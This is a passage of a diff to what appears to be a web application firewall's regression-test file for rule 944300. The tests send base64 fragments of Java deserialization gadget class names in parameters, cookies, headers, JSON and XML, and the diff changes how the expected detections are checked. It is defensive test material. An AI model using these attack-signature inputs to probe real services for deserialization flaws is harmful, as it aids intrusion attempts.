"id \"944300\"" + log: + expect_ids: [944300] - test_id: 75 desc: "Content-Type text/plain includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: @@ -1449,7 +1523,8 @@ tests: version: "HTTP/1.0" data: "test=Y2xvbmV0cmFuc2Zvcm1lcg" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 76 desc: "Content-Type application/json arg value includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: @@ -1468,7 +1543,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"Y2xvbmV0cmFuc2Zvcm1lcg\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 77 desc: "Content-Type application/json arg name includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: @@ -1487,7 +1563,8 @@ tests: version: "HTTP/1.0" data: "{\"Y2xvbmV0cmFuc2Zvcm1lcg\": \"test\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 78 desc: "Argument test includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: @@ -1506,7 +1583,8 @@ tests: version: "HTTP/1.0" data: "test=GNsb25ldHJhbnNmb3JtZXI" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 79 desc: "Argument name includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: @@ -1525,7 +1603,8 @@ tests: version: "HTTP/1.0" data: "GNsb25ldHJhbnNmb3JtZXI=test" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 80 desc: "Cookie test includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: @@ -1545,7 +1624,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 81 desc: "Cookie name includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: @@ -1565,7 +1645,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 82 desc: "Request header test includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: @@ -1585,7 +1666,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 83 desc: "XML attribute value includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: @@ -1604,7 +1686,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 84 desc: "XML element value includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: @@ -1623,7 +1706,8 @@ tests: version: "HTTP/1.0" data: "GNsb25ldHJhbnNmb3JtZXI" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 85 desc: "Nested XML element value includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: @@ -1642,7 +1726,8 @@ tests: version: "HTTP/1.0" data: "GNsb25ldHJhbnNmb3JtZXI" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 86 desc: "Content-Type text/plain includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: @@ -1661,7 +1746,8 @@ tests: version: "HTTP/1.0" data: "test=GNsb25ldHJhbnNmb3JtZXI" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 87 desc: "Content-Type application/json arg value includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: @@ -1680,7 +1766,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"GNsb25ldHJhbnNmb3JtZXI\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 88 desc: "Content-Type application/json arg name includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: @@ -1699,7 +1786,8 @@ tests: version: "HTTP/1.0" data: "{\"GNsb25ldHJhbnNmb3JtZXI\": \"test\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 89 desc: "Argument test includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: @@ -1718,7 +1806,8 @@ tests: version: "HTTP/1.0" data: "test=BjbG9uZXRyYW5zZm9ybWVy" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 90 desc: "Argument name includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: @@ -1737,7 +1826,8 @@ tests: version: "HTTP/1.0" data: "BjbG9uZXRyYW5zZm9ybWVy=test" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 91 desc: "Cookie test includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: @@ -1757,7 +1847,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 92 desc: "Cookie name includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: @@ -1777,7 +1868,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 93 desc: "Request header test includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: @@ -1797,7 +1889,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 94 desc: "XML attribute value includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: @@ -1816,7 +1909,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 95 desc: "XML element value includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: @@ -1835,7 +1929,8 @@ tests: version: "HTTP/1.0" data: "BjbG9uZXRyYW5zZm9ybWVy" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 96 desc: "Nested XML element value includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: @@ -1854,7 +1949,8 @@ tests: version: "HTTP/1.0" data: "BjbG9uZXRyYW5zZm9ybWVy" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 97 desc: "Content-Type text/plain includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: @@ -1873,7 +1969,8 @@ tests: version: "HTTP/1.0" data: "test=BjbG9uZXRyYW5zZm9ybWVy" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 98 desc: "Content-Type application/json arg value includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: @@ -1892,7 +1989,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"BjbG9uZXRyYW5zZm9ybWVy\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 99 desc: "Content-Type application/json arg name includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: @@ -1911,7 +2009,8 @@ tests: version: "HTTP/1.0" data: "{\"BjbG9uZXRyYW5zZm9ybWVy\": \"test\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 100 desc: "Argument test includes keyword Zm9yY2xvc3VyZQ" stages: @@ -1930,7 +2029,8 @@ tests: version: "HTTP/1.0" data: "test=Zm9yY2xvc3VyZQ" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 101 desc: "Argument name includes keyword Zm9yY2xvc3VyZQ" stages: @@ -1949,7 +2049,8 @@ tests: version: "HTTP/1.0" data: "Zm9yY2xvc3VyZQ=test" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 102 desc: "Cookie test includes keyword Zm9yY2xvc3VyZQ" stages: @@ -1969,7 +2070,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 103 desc: "Cookie name includes keyword Zm9yY2xvc3VyZQ" stages: @@ -1989,7 +2091,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 104 desc: "Request header test includes keyword Zm9yY2xvc3VyZQ" stages: @@ -2009,7 +2112,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 105 desc: "XML attribute value includes keyword Zm9yY2xvc3VyZQ" stages: @@ -2028,7 +2132,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 106 desc: "XML element value includes keyword Zm9yY2xvc3VyZQ" stages: @@ -2047,7 +2152,8 @@ tests: version: "HTTP/1.0" data: "Zm9yY2xvc3VyZQ" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 107 desc: "Nested XML element value includes keyword Zm9yY2xvc3VyZQ" stages: @@ -2066,7 +2172,8 @@ tests: version: "HTTP/1.0" data: "Zm9yY2xvc3VyZQ" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 108 desc: "Content-Type text/plain includes keyword Zm9yY2xvc3VyZQ" stages: @@ -2085,7 +2192,8 @@ tests: version: "HTTP/1.0" data: "test=Zm9yY2xvc3VyZQ" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 109 desc: "Content-Type application/json arg value includes keyword Zm9yY2xvc3VyZQ" stages: @@ -2104,7 +2212,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"Zm9yY2xvc3VyZQ\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 110 desc: "Content-Type application/json arg name includes keyword Zm9yY2xvc3VyZQ" stages: @@ -2123,7 +2232,8 @@ tests: version: "HTTP/1.0" data: "{\"Zm9yY2xvc3VyZQ\": \"test\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 111 desc: "Argument test includes keyword GZvcmNsb3N1cmU" stages: @@ -2142,7 +2252,8 @@ tests: version: "HTTP/1.0" data: "test=GZvcmNsb3N1cmU" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 112 desc: "Argument name includes keyword GZvcmNsb3N1cmU" stages: @@ -2161,7 +2272,8 @@ tests: version: "HTTP/1.0" data: "GZvcmNsb3N1cmU=test" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 113 desc: "Cookie test includes keyword GZvcmNsb3N1cmU" stages: @@ -2181,7 +2293,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 114 desc: "Cookie name includes keyword GZvcmNsb3N1cmU" stages: @@ -2201,7 +2314,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 115 desc: "Request header test includes keyword GZvcmNsb3N1cmU" stages: @@ -2221,7 +2335,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 116 desc: "XML attribute value includes keyword GZvcmNsb3N1cmU" stages: @@ -2240,7 +2355,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 117 desc: "XML element value includes keyword GZvcmNsb3N1cmU" stages: @@ -2259,7 +2375,8 @@ tests: version: "HTTP/1.0" data: "GZvcmNsb3N1cmU" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 118 desc: "Nested XML element value includes keyword GZvcmNsb3N1cmU" stages: @@ -2278,7 +2395,8 @@ tests: version: "HTTP/1.0" data: "GZvcmNsb3N1cmU" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 119 desc: "Content-Type text/plain includes keyword GZvcmNsb3N1cmU" stages: @@ -2297,7 +2415,8 @@ tests: version: "HTTP/1.0" data: "test=GZvcmNsb3N1cmU" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 120 desc: "Content-Type application/json arg value includes keyword GZvcmNsb3N1cmU" stages: @@ -2316,7 +2435,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"GZvcmNsb3N1cmU\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 121 desc: "Content-Type application/json arg name includes keyword GZvcmNsb3N1cmU" stages: @@ -2335,7 +2455,8 @@ tests: version: "HTTP/1.0" data: "{\"GZvcmNsb3N1cmU\": \"test\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 122 desc: "Argument test includes keyword Bmb3JjbG9zdXJl" stages: @@ -2354,7 +2475,8 @@ tests: version: "HTTP/1.0" data: "test=Bmb3JjbG9zdXJl" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 123 desc: "Argument name includes keyword Bmb3JjbG9zdXJl" stages: @@ -2373,7 +2495,8 @@ tests: version: "HTTP/1.0" data: "Bmb3JjbG9zdXJl=test" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 124 desc: "Cookie test includes keyword Bmb3JjbG9zdXJl" stages: @@ -2393,7 +2516,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 125 desc: "Cookie name includes keyword Bmb3JjbG9zdXJl" stages: @@ -2413,7 +2537,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 126 desc: "Request header test includes keyword Bmb3JjbG9zdXJl" stages: @@ -2433,7 +2558,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 127 desc: "XML attribute value includes keyword Bmb3JjbG9zdXJl" stages: @@ -2452,7 +2578,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 128 desc: "XML element value includes keyword Bmb3JjbG9zdXJl" stages: @@ -2471,7 +2598,8 @@ tests: version: "HTTP/1.0" data: "Bmb3JjbG9zdXJl" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 129 desc: "Nested XML element value includes keyword Bmb3JjbG9zdXJl" stages: @@ -2490,7 +2618,8 @@ tests: version: "HTTP/1.0" data: "Bmb3JjbG9zdXJl" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 130 desc: "Content-Type text/plain includes keyword Bmb3JjbG9zdXJl" stages: @@ -2509,7 +2638,8 @@ tests: version: "HTTP/1.0" data: "test=Bmb3JjbG9zdXJl" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 131 desc: "Content-Type application/json arg value includes keyword Bmb3JjbG9zdXJl" stages: @@ -2528,7 +2658,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"Bmb3JjbG9zdXJl\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 132 desc: "Content-Type application/json arg name includes keyword Bmb3JjbG9zdXJl" stages: @@ -2547,7 +2678,8 @@ tests: version: "HTTP/1.0" data: "{\"Bmb3JjbG9zdXJl\": \"test\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 133 desc: "Argument test includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: @@ -2566,7 +2698,8 @@ tests: version: "HTTP/1.0" data: "test=aW5zdGFudGlhdGVmYWN0b3J5" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 134 desc: "Argument name includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: @@ -2585,7 +2718,8 @@ tests: version: "HTTP/1.0" data: "aW5zdGFudGlhdGVmYWN0b3J5=test" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 135 desc: "Cookie test includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: @@ -2605,7 +2739,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 136 desc: "Cookie name includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: @@ -2625,7 +2760,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 137 desc: "Request header test includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: @@ -2645,7 +2781,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 138 desc: "XML attribute value includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: @@ -2664,7 +2801,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 139 desc: "XML element value includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: @@ -2683,7 +2821,8 @@ tests: version: "HTTP/1.0" data: "aW5zdGFudGlhdGVmYWN0b3J5" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 140 desc: "Nested XML element value includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: @@ -2702,7 +2841,8 @@ tests: version: "HTTP/1.0" data: "aW5zdGFudGlhdGVmYWN0b3J5" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 141 desc: "Content-Type text/plain includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: @@ -2721,7 +2861,8 @@ tests: version: "HTTP/1.0" data: "test=aW5zdGFudGlhdGVmYWN0b3J5" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 142 desc: "Content-Type application/json arg value includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: @@ -2740,7 +2881,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"aW5zdGFudGlhdGVmYWN0b3J5\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 143 desc: "Content-Type application/json arg name includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: @@ -2759,7 +2901,8 @@ tests: version: "HTTP/1.0" data: "{\"aW5zdGFudGlhdGVmYWN0b3J5\": \"test\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 144 desc: "Argument test includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: @@ -2778,7 +2921,8 @@ tests: version: "HTTP/1.0" data: "test=Gluc3RhbnRpYXRlZmFjdG9yeQ" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 145 desc: "Argument name includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: @@ -2797,7 +2941,8 @@ tests: version: "HTTP/1.0" data: "Gluc3RhbnRpYXRlZmFjdG9yeQ=test" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 146 desc: "Cookie test includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: @@ -2817,7 +2962,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 147 desc: "Cookie name includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: @@ -2837,7 +2983,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 148 desc: "Request header test includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: @@ -2857,7 +3004,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 149 desc: "XML attribute value includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: @@ -2876,7 +3024,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 150 desc: "XML element value includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: @@ -2895,7 +3044,8 @@ tests: version: "HTTP/1.0" data: "Gluc3RhbnRpYXRlZmFjdG9yeQ" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 151 desc: "Nested XML element value includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: @@ -2914,7 +3064,8 @@ tests: version: "HTTP/1.0" data: "Gluc3RhbnRpYXRlZmFjdG9yeQ" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 152 desc: "Content-Type text/plain includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: @@ -2933,7 +3084,8 @@ tests: version: "HTTP/1.0" data: "test=Gluc3RhbnRpYXRlZmFjdG9yeQ" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 153 desc: "Content-Type application/json arg value includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: @@ -2952,7 +3104,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"Gluc3RhbnRpYXRlZmFjdG9yeQ\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 154 desc: "Content-Type application/json arg name includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: @@ -2971,7 +3124,8 @@ tests: version: "HTTP/1.0" data: "{\"Gluc3RhbnRpYXRlZmFjdG9yeQ\": \"test\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 155 desc: "Argument test includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: @@ -2990,7 +3144,8 @@ tests: version: "HTTP/1.0" data: "test=BpbnN0YW50aWF0ZWZhY3Rvcnk" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 156 desc: "Argument name includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: @@ -3009,7 +3164,8 @@ tests: version: "HTTP/1.0" data: "BpbnN0YW50aWF0ZWZhY3Rvcnk=test" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 157 desc: "Cookie test includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: @@ -3029,7 +3185,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 158 desc: "Cookie name includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: @@ -3049,7 +3206,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 159 desc: "Request header test includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: @@ -3069,7 +3227,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 160 desc: "XML attribute value includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: @@ -3088,7 +3247,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 161 desc: "XML element value includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: @@ -3107,7 +3267,8 @@ tests: version: "HTTP/1.0" data: "BpbnN0YW50aWF0ZWZhY3Rvcnk" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 162 desc: "Nested XML element value includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: @@ -3126,7 +3287,8 @@ tests: version: "HTTP/1.0" data: "BpbnN0YW50aWF0ZWZhY3Rvcnk" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 163 desc: "Content-Type text/plain includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: @@ -3145,7 +3307,8 @@ tests: version: "HTTP/1.0" data: "test=BpbnN0YW50aWF0ZWZhY3Rvcnk" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 164 desc: "Content-Type application/json arg value includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: @@ -3164,7 +3327,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"BpbnN0YW50aWF0ZWZhY3Rvcnk\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 165 desc: "Content-Type application/json arg name includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: @@ -3183,7 +3347,8 @@ tests: version: "HTTP/1.0" data: "{\"BpbnN0YW50aWF0ZWZhY3Rvcnk\": \"test\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 166 desc: "Argument test includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: @@ -3202,7 +3367,8 @@ tests: version: "HTTP/1.0" data: "test=aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 167 desc: "Argument name includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: @@ -3221,7 +3387,8 @@ tests: version: "HTTP/1.0" data: "aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg=test" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 168 desc: "Cookie test includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: @@ -3241,7 +3408,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 169 desc: "Cookie name includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: @@ -3261,7 +3429,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 170 desc: "Request header test includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: @@ -3281,7 +3450,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 171 desc: "XML attribute value includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: @@ -3300,7 +3470,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 172 desc: "XML element value includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: @@ -3319,7 +3490,8 @@ tests: version: "HTTP/1.0" data: "aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 173 desc: "Nested XML element value includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: @@ -3338,7 +3510,8 @@ tests: version: "HTTP/1.0" data: "aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 174 desc: "Content-Type text/plain includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: @@ -3357,7 +3530,8 @@ tests: version: "HTTP/1.0" data: "test=aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 175 desc: "Content-Type application/json arg value includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: @@ -3376,7 +3550,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 176 desc: "Content-Type application/json arg name includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: @@ -3395,7 +3570,8 @@ tests: version: "HTTP/1.0" data: "{\"aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg\": \"test\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 177 desc: "Argument test includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: @@ -3414,7 +3590,8 @@ tests: version: "HTTP/1.0" data: "test=Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 178 desc: "Argument name includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: @@ -3433,7 +3610,8 @@ tests: version: "HTTP/1.0" data: "Gluc3RhbnRpYXRldHJhbnNmb3JtZXI=test" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 179 desc: "Cookie test includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: @@ -3453,7 +3631,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 180 desc: "Cookie name includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: @@ -3473,7 +3652,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 181 desc: "Request header test includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: @@ -3493,7 +3673,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 182 desc: "XML attribute value includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: @@ -3512,7 +3693,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 183 desc: "XML element value includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: @@ -3531,7 +3713,8 @@ tests: version: "HTTP/1.0" data: "Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 184 desc: "Nested XML element value includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: @@ -3550,7 +3733,8 @@ tests: version: "HTTP/1.0" data: "Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 185 desc: "Content-Type text/plain includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: @@ -3569,7 +3753,8 @@ tests: version: "HTTP/1.0" data: 